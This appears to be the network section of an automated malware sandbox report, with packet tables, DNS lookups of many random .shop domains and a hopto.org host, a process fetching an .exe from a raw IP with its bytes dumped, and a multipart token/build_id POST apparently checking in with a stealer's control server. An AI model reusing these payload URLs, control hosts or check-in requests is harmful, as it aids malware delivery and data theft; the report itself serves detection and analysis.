Sep 20, 2024 11:08:10.296226978 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.296436071 CEST	49774	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:10.296828032 CEST	49774	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:10.296839952 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.776830912 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.777111053 CEST	49774	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:10.778681040 CEST	49774	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:10.778695107 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.779093027 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:10.780308962 CEST	49774	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:10.780333996 CEST	49774	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:10.780391932 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:11.178910017 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:11.179141998 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:11.179220915 CEST	49774	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:11.179807901 CEST	49774	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:11.179848909 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:11.179878950 CEST	49774	443	192.168.2.4	188.114.96.3
Sep 20, 2024 11:08:11.179894924 CEST	443	49774	188.114.96.3	192.168.2.4
Sep 20, 2024 11:08:11.196902990 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:11.196939945 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:11.196986914 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:11.197469950 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:11.197487116 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:11.679202080 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:11.679280996 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:11.681035042 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:11.681044102 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:11.681370020 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:11.682509899 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:11.682543993 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:11.682591915 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:11.778785944 CEST	49762	80	192.168.2.4	147.45.44.104
Sep 20, 2024 11:08:11.778891087 CEST	49767	80	192.168.2.4	45.132.206.251
Sep 20, 2024 11:08:12.104696035 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:12.104945898 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:12.105026007 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:12.105092049 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:12.105113029 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:12.105128050 CEST	49775	443	192.168.2.4	172.67.192.105
Sep 20, 2024 11:08:12.105134964 CEST	443	49775	172.67.192.105	192.168.2.4
Sep 20, 2024 11:08:12.115667105 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:12.115736008 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:12.115907907 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:12.116122961 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:12.116147041 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:12.740403891 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:12.740518093 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:12.741825104 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:12.741842031 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:12.742603064 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:12.743845940 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:12.787417889 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.338912010 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.338979006 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.339024067 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.339080095 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.339118004 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.339143991 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.339211941 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.340085983 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.340143919 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.340183973 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.340204954 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.340307951 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.342201948 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.342242002 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.342278004 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.342293024 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.342335939 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.342426062 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.342451096 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.342504025 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.342521906 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.342521906 CEST	49776	443	192.168.2.4	23.192.247.89
Sep 20, 2024 11:08:13.342544079 CEST	443	49776	23.192.247.89	192.168.2.4
Sep 20, 2024 11:08:13.342562914 CEST	443	49776	23.192.247.89	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 20, 2024 11:07:23.748049021 CEST	57789	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:07:23.754935980 CEST	53	57789	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:03.502338886 CEST	65323	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:03.517281055 CEST	53	65323	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:04.479633093 CEST	63808	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:04.496078968 CEST	53	63808	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:05.308273077 CEST	51827	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:05.317609072 CEST	53	51827	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:05.440800905 CEST	55237	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:05.454509020 CEST	53	55237	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:06.350523949 CEST	64919	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:06.363687992 CEST	53	64919	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:07.322920084 CEST	64553	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:07.339893103 CEST	53	64553	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:08.238843918 CEST	52145	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:08.251461029 CEST	53	52145	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:09.370625973 CEST	50228	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:09.385096073 CEST	53	50228	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:10.278815985 CEST	65057	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:10.294174910 CEST	53	65057	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:11.182126999 CEST	60008	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:11.195641994 CEST	53	60008	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:12.106487036 CEST	49363	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:12.114980936 CEST	53	49363	1.1.1.1	192.168.2.4
Sep 20, 2024 11:08:13.345662117 CEST	61201	53	192.168.2.4	1.1.1.1
Sep 20, 2024 11:08:13.355858088 CEST	53	61201	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 20, 2024 11:07:23.748049021 CEST	192.168.2.4	1.1.1.1	0x7a25	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:03.502338886 CEST	192.168.2.4	1.1.1.1	0x84cf	Standard query (0)	questionmwq.shop	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:04.479633093 CEST	192.168.2.4	1.1.1.1	0x127d	Standard query (0)	chickerkuso.shop	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:05.308273077 CEST	192.168.2.4	1.1.1.1	0x16e1	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:05.440800905 CEST	192.168.2.4	1.1.1.1	0xcae5	Standard query (0)	achievenmtynwjq.shop	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:06.350523949 CEST	192.168.2.4	1.1.1.1	0x91a1	Standard query (0)	puredoffustow.shop	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:07.322920084 CEST	192.168.2.4	1.1.1.1	0x412d	Standard query (0)	opponnentduei.shop	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:08.238843918 CEST	192.168.2.4	1.1.1.1	0x9712	Standard query (0)	metallygaricwo.shop	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:09.370625973 CEST	192.168.2.4	1.1.1.1	0x88f5	Standard query (0)	milldymarskwom.shop	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:10.278815985 CEST	192.168.2.4	1.1.1.1	0x47bd	Standard query (0)	quotamkdsdqo.shop	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:11.182126999 CEST	192.168.2.4	1.1.1.1	0xb5ac	Standard query (0)	carrtychaintnyw.shop	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:12.106487036 CEST	192.168.2.4	1.1.1.1	0x92b9	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:13.345662117 CEST	192.168.2.4	1.1.1.1	0x557b	Standard query (0)	genedjestytw.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 20, 2024 11:07:23.754935980 CEST	1.1.1.1	192.168.2.4	0x7a25	No error (0)	steamcommunity.com		23.50.98.133	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:03.517281055 CEST	1.1.1.1	192.168.2.4	0x84cf	No error (0)	questionmwq.shop		172.67.204.62	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:03.517281055 CEST	1.1.1.1	192.168.2.4	0x84cf	No error (0)	questionmwq.shop		104.21.85.92	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:04.496078968 CEST	1.1.1.1	192.168.2.4	0x127d	No error (0)	chickerkuso.shop		104.21.88.61	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:04.496078968 CEST	1.1.1.1	192.168.2.4	0x127d	No error (0)	chickerkuso.shop		172.67.173.81	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:05.317609072 CEST	1.1.1.1	192.168.2.4	0x16e1	No error (0)	cowod.hopto.org		45.132.206.251	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:05.454509020 CEST	1.1.1.1	192.168.2.4	0xcae5	No error (0)	achievenmtynwjq.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:05.454509020 CEST	1.1.1.1	192.168.2.4	0xcae5	No error (0)	achievenmtynwjq.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:06.363687992 CEST	1.1.1.1	192.168.2.4	0x91a1	No error (0)	puredoffustow.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:06.363687992 CEST	1.1.1.1	192.168.2.4	0x91a1	No error (0)	puredoffustow.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:07.339893103 CEST	1.1.1.1	192.168.2.4	0x412d	No error (0)	opponnentduei.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:07.339893103 CEST	1.1.1.1	192.168.2.4	0x412d	No error (0)	opponnentduei.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:08.251461029 CEST	1.1.1.1	192.168.2.4	0x9712	No error (0)	metallygaricwo.shop		104.21.75.242	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:08.251461029 CEST	1.1.1.1	192.168.2.4	0x9712	No error (0)	metallygaricwo.shop		172.67.184.9	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:09.385096073 CEST	1.1.1.1	192.168.2.4	0x88f5	No error (0)	milldymarskwom.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:09.385096073 CEST	1.1.1.1	192.168.2.4	0x88f5	No error (0)	milldymarskwom.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:10.294174910 CEST	1.1.1.1	192.168.2.4	0x47bd	No error (0)	quotamkdsdqo.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:10.294174910 CEST	1.1.1.1	192.168.2.4	0x47bd	No error (0)	quotamkdsdqo.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:11.195641994 CEST	1.1.1.1	192.168.2.4	0xb5ac	No error (0)	carrtychaintnyw.shop		172.67.192.105	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:11.195641994 CEST	1.1.1.1	192.168.2.4	0xb5ac	No error (0)	carrtychaintnyw.shop		104.21.81.254	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:12.114980936 CEST	1.1.1.1	192.168.2.4	0x92b9	No error (0)	steamcommunity.com		23.192.247.89	A (IP address)	IN (0x0001)	false
Sep 20, 2024 11:08:13.355858088 CEST	1.1.1.1	192.168.2.4	0x557b	Name error (3)	genedjestytw.shop	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

116.203.165.127

questionmwq.shop

chickerkuso.shop

achievenmtynwjq.shop

cowod.hopto.org

puredoffustow.shop

opponnentduei.shop

metallygaricwo.shop

milldymarskwom.shop

quotamkdsdqo.shop

carrtychaintnyw.shop

147.45.44.104

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49762	147.45.44.104	80	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 20, 2024 11:08:00.941457987 CEST	194	OUT	GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Sep 20, 2024 11:08:01.565751076 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:08:01 GMT Content-Type: application/octet-stream Content-Length: 363424 Last-Modified: Thu, 19 Sep 2024 23:31:32 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66ecb454-58ba0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e b2 ec 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 32 05 00 00 08 00 00 00 00 00 00 7e 51 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 51 05 00 4f 00 00 00 00 60 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 78 65 05 00 28 26 00 00 00 80 05 00 0c 00 00 00 f4 4f 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf2~Q `@ `,QO`xe(&O H.text1 2 `.rsrc`4@@.reloc:@B`QHAVeOz?Z#btHxK+,57>1G2%ju-EmRU-6W4bW5>B] sf'(o}kPq>j][T.sp}HT-o8.^pK7?ntEK>^8p+bW{:SjZzd2i65u\|vUy1#6P}$K\X$ZDXqK^I>Ljv-H-KEG)r
Sep 20, 2024 11:08:01.565776110 CEST	1236	IN	Data Raw: b2 43 8e 2c 79 2d 5e 36 8d b2 90 cf f2 d9 15 8d 12 89 0b 18 7e 4d 4a 29 8b 27 c0 ea d3 0f 4b a4 cb 09 9b 22 70 d5 35 b8 f3 cb 39 f6 9a de 41 af 93 30 89 d5 97 73 43 55 c3 db 3d a6 ec 1f e1 03 ef 9c f7 46 59 79 b1 b1 19 42 0c b5 77 eb d9 c9 7e b0 Data Ascii: C,y-^6~MJ)'K"p59A0sCU=FYyBw~JqF:Yt;<b2D/.r}q~PcS)4&/cWHJ\q%QEdIjh^qYaadn/ny)w,HDQ<(Z}hkUkr.4"lB@
Sep 20, 2024 11:08:01.565789938 CEST	1236	IN	Data Raw: d1 ea e2 69 68 04 00 07 2e 7b 9a 13 7f a0 9e f6 8c a3 e5 14 6c cf 9c 83 27 93 93 4d bc 34 a7 7e 03 9a 25 6b 69 d6 c4 34 a6 7d 78 60 05 f7 6c 13 19 6f 27 9b ff 7d 6e 23 06 a6 ad 17 73 f5 1a 56 33 5b 94 e3 e1 c8 9e a8 b6 23 a4 dd 50 ee 95 03 5d a2 Data Ascii: ih.{l'M4~%ki4}x`lo'}n#sV3[#P]HHPOUL\R43sAKQzO7+h.Kdj};].1t8L)lz:[N34\H+J.rJ::\|!cK^ILi{4q9hT
Sep 20, 2024 11:08:01.565855980 CEST	1236	IN	Data Raw: 6f 59 b7 fa 5b 1a 4a c4 7c 64 7e 67 c5 b0 e8 61 46 2b df c1 b2 96 02 ff 87 75 25 68 76 56 cd a1 e5 5e e6 2e b1 6e f8 49 91 f3 c5 32 16 a4 bd 5e 16 f3 86 43 5c 88 6d 38 8e 5c 9b d2 1b e7 df 99 ed cb cf 37 65 ef 86 42 a1 74 5b c6 60 89 35 28 92 06 Data Ascii: oY[J\|d~gaF+u%hvV^.nI2^C\m8\7eBt[`5(_RIs)2dT*YjlR0pC.-JbhG$NG7'f"`.M#l^dU9!)rG2esq.\|)2A;iW:T\|:q\|=O
Sep 20, 2024 11:08:01.565866947 CEST	896	IN	Data Raw: 2d 04 8c ad 9b dd 7a 05 77 be 14 87 c1 d1 6c e0 82 e1 48 a1 54 53 86 20 3b 6a 25 45 ef b5 af 98 74 e3 e6 07 6c 7e 63 5e 35 74 6f 05 c9 db 40 0e 66 1a 1a c2 ea 77 58 6b 92 f1 de 9a 1e 92 ee 7a cd 4f 54 30 66 cd a3 bf 08 4d 3b bc 91 c8 56 8c c8 1a Data Ascii: -zwlHTS ;j%Etl~c^5to@fwXkzOT0fM;V;bfY9sBx.Ehj!`TGEj;OP{%`jn:D~MAKIz1}9_8[f:9j-J_e4w5$jF_07<Sq4~\|"S8UXtc$jl,gLZ
Sep 20, 2024 11:08:01.566030979 CEST	1236	IN	Data Raw: 58 1a 63 09 b2 cc 48 f1 42 18 f1 b1 fd e5 c3 9a 0b 19 dd 75 bc 1c 76 bd ee ec 06 ca ef f0 3c 4c 14 5f 54 6c be 63 52 71 cb 14 8a 05 b1 4a d3 3d bf f4 5b 6f de 0c b1 25 00 9b 7a 82 20 de 77 43 ea 03 81 ca f5 67 2b 25 da 70 a5 7e 31 48 a3 dd 03 99 Data Ascii: XcHBuv<L_TlcRqJ=[o%z wCg+%p~1HR:zNg?+%m*~(q>h]`\|v9-&zG4>&+$-\|2L6SbWK<]a\Z'U^{O>RBJscu{CR
Sep 20, 2024 11:08:01.566049099 CEST	1236	IN	Data Raw: 51 cd 82 9a 59 1a 2f a9 f1 80 6b 3e 11 88 25 14 59 58 28 b2 e6 ea f3 ff bf a2 a0 26 00 bc ac 25 4b cf 2d 76 8e 38 7e 74 70 9f c2 71 53 51 00 d4 08 bd 0a 0b f7 da fa b9 ab 33 bc f3 5e 16 cf c6 21 c8 d9 08 85 c3 d4 28 ab 76 d8 85 0a eb f3 b0 5a d6 Data Ascii: QY/k>%YX(&%K-v8~tpqSQ3^!(vZgs]qd]gGnIaqjyvSo\RY(^DG&`!KS\|jr/vZ~:05]^TKi[qQr\|?"y%738Kcj&oHSCw('240T$&
Sep 20, 2024 11:08:01.566060066 CEST	1236	IN	Data Raw: 5e c7 99 a3 4e 04 ad 95 e4 a5 0c d3 01 84 f6 04 85 67 ad 06 fc eb db 6c 7b a3 da 8a 6a aa da a6 f4 fc c9 fb 4d 53 65 f4 85 ad c5 82 db 1d e4 2b 4f 0c 0e d9 85 f8 51 98 db 5a 59 23 cd 1b 2e 3b 2b b8 bc 23 c5 38 9a fb d9 9c 11 1e 63 ed 9f 68 9e 03 Data Ascii: ^Ngl{jMSe+OQZY#.;+#8ch#<tj;b?F_U tF@`P\|3&q,D5b{qV5V`wf/V01A-- k/px%tioV0
Sep 20, 2024 11:08:01.566070080 CEST	1236	IN	Data Raw: 8e 50 13 26 c2 b7 bc 0d df f3 26 87 2f d9 08 20 26 2b 81 fc e4 28 62 b5 00 37 2b c3 46 a1 88 ac f6 fa 4f 7c 3a 10 52 88 2e ae 65 a0 fc 50 7a 3d 9b 14 c7 4b 6c 6e 42 96 cb 24 6a 21 c3 4c 26 ae a1 97 4c 48 ef 27 49 b3 a2 96 d5 92 e1 b3 d3 56 eb 91 Data Ascii: P&&/ &+(b7+FO\|:R.ePz=KlnB$j!L&LH'IV<gAeH&`Gz'ZdNO"{]l}7Np-biC#2+6}i-s!(.[oeO^[1#mvr`/1<Q9w94M/{'GE
Sep 20, 2024 11:08:01.566081047 CEST	1236	IN	Data Raw: d9 09 3a 2b eb 9e 83 d5 ee 37 9e 6c 37 b6 8c 2a cd 10 42 10 94 56 32 45 bd 9e 88 73 9c d3 c0 07 02 95 52 4e fd 81 df 01 49 69 b3 57 f6 11 a9 92 e8 37 eb a2 e2 75 46 3f b0 ff 9b a3 a6 01 14 4c fc 2c fe 90 a7 14 2d f7 1b 9b f2 e5 0e af 82 f4 6a fa Data Ascii: :+7l7*BV2EsRNIiW7uF?L,-j6]_\dFhOhunc$')PURTJg;T#s!b<mU>pf`}\|OmNQ3O7`z"qU/O
Sep 20, 2024 11:08:01.574949026 CEST	1236	IN	Data Raw: 95 3f 96 5f 80 73 27 ea e1 3c 23 74 08 28 48 93 35 0f 85 8b 63 9f eb 70 c9 ea f4 6e c6 84 82 71 cd 43 3b 1e 8a ba 3b 5f ae 33 3c 48 8f c3 1b 00 e7 15 7e 4a ec c7 f2 c0 d8 06 36 42 2b 51 75 24 7e 06 15 0d 5c 39 b9 fe 5a ed 5f 0f ad 4a 93 90 e1 2b Data Ascii: ?_s'<#t(H5cpnqC;;_3<H~J6B+Qu$~\9Z_J+=b#[:~%,x;u3Nw3}B6/Bpg3LV[FABU<13t!iERo_!'j>/~J]M_Q@Ibhvuf@ch6PPs^x

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49767	45.132.206.251	80	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Sep 20, 2024 11:08:05.323455095 CEST	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 5785 Connection: Keep-Alive Cache-Control: no-cache
Sep 20, 2024 11:08:05.323470116 CEST	5785	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 Data Ascii: ------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------DHJDAKEGDBFHCA
Sep 20, 2024 11:08:05.990606070 CEST	362	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Fri, 20 Sep 2024 09:08:05 GMT Content-Type: text/html Content-Length: 166 Connection: keep-alive Location: https://cowod.hopto.org/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	23.50.98.133	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:07:24 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:07:24 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Fri, 20 Sep 2024 09:07:24 GMT Content-Length: 34740 Connection: close Set-Cookie: sessionid=ac8d3ccbe902d7fbaf475212; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
